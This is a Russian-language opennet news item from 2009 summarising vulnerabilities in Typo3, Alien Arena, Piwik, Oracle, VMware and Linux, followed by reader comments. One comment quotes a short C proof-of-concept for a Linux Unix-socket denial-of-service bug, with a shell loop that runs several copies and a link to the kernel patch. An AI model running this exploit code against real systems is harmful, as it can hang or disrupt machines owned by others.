Серия новых уязвимостей:

-  В системе управления web-контентом Typo3 (http://typo3.org/) найдено 7 уязвимостей (http://secunia.com/advisories/37122/), среди которых имеется серьезная проблема - возможность осуществить подстановку SQL кода аутентифицированным пользователем. Остальные проблемы связаны с совершением XSS атак (межсайтовый скриптинг), обходом механизмов контроля доступа и возможностью выполнить shell-скрипты на сервере, при наличии редакторского уровня доступа и установке стороннего upload-расширений. С исправлением проблем (http://typo3.org/teams/security/security-bulletins/typo3-sa-.../) в экстренном порядке выпущены версии 4.1.13, 4.2.10 и 4.3beta2.

-  В открытой игре  Alien Arena (http://red.planetarena.org/) найдена критическая уязвимость (http://secunia.com/advisories/37118/), позволяющая злоумышленнику выполнить свой код на игровом сервере, отправив специально модифицированный UDP-пакет на сетевой порт 27901. Проблема испрошена в выпуске 7.31;

-  В п...

URL: http://www.oracle.com/technology/deploy/security/critical-pa...
Новость: http://www.opennet.me/opennews/art.shtml?num=23973

• Уязвимости в Typo3, Alien Arena, Piwik, Oracle, VMware и Lin...,NicK, 22:47 , 24-Окт-09
  • Уязвимости в Typo3, Alien Arena, Piwik, Oracle, VMware и Lin...,anonymouse, 23:27 , 24-Окт-09
  • Уязвимости в Typo3, Alien Arena, Piwik, Oracle, VMware и Lin...,XoRe, 00:49 , 25-Окт-09
    • Уязвимости в Typo3, Alien Arena, Piwik, Oracle, VMware и Lin...,Zenitur, 03:11 , 26-Окт-09
• Уязвимости в Typo3, Alien Arena, Piwik, Oracle, VMware и Lin...,User294, 23:08 , 24-Окт-09
  • Уязвимости в Typo3, Alien Arena, Piwik, Oracle, VMware и Lin...,ононим, 23:30 , 24-Окт-09
  • Уязвимости в Typo3, Alien Arena, Piwik, Oracle, VMware и Lin...,Moosh, 15:56 , 26-Окт-09
• Уязвимости в Typo3, Alien Arena, Piwik, Oracle, VMware и Lin...,pavlinux, 19:35 , 25-Окт-09

А что сервер Alien Arena выполняется с правами root?

> А что сервер Alien Arena выполняется с правами root?

А что левый код у вас может выполнятся под учётной записью?

>А что сервер Alien Arena выполняется с правами root?

Думаю, как настроят, так и выполняется.
А настраивают по разному...)

Если человек создаст сервер на FreeBSD или Linux, который будет круглосуточно заниматься только Alien Arena, то да - вполне возможно, что сервер запустится от root.

> В системе управления web-контентом Typo3 найдено 7 уязвимостей,

А кто-то мне говорил что он безопасный... но как видим нет в мире совершенства.

Кнут считает по другому.

Тупо3 и безопасный? Оксюморон!
Вместо чем верить кому-то, стоило просто посмотреть security advisory.

> Из за трудности эксплуатации уязвимостям присвоен незначительный уровень опасности.

------------
int main(void) {

int ret, csd, lsd;
struct sockaddr_un sun;

/* make an abstruct name address (*) */
memset(&sun, 0, sizeof(sun));
sun.sun_family = PF_UNIX;
sprintf(&sun.sun_path[1], "%d", getpid());

/* create the listening socket and shutdown */
lsd = socket(AF_UNIX, SOCK_STREAM, 0);
bind(lsd, (struct sockaddr *)&sun, sizeof(sun));
listen(lsd, 1);
shutdown(lsd, SHUT_RDWR);

/* connect loop */
alarm(15); /* forcely exit the loop after 15 sec */
for (;;) {
    csd = socket(AF_UNIX, SOCK_STREAM, 0);
    ret = connect(csd, (struct sockaddr *)&sun, sizeof(sun));
    if (-1 == ret) {
        perror("connect()");
        break;
    }
    puts("Connection OK");
   }
return 0;
}
-----

You should run the ./unix-socket-dos-exploit concurrently, like below:
for i in {1..4} ; do ./unix-socket-dos-exploit & done
# For safety reason, the PoC code stops in 15 seconds by alarm(15).

http://patchwork.kernel.org/patch/54678/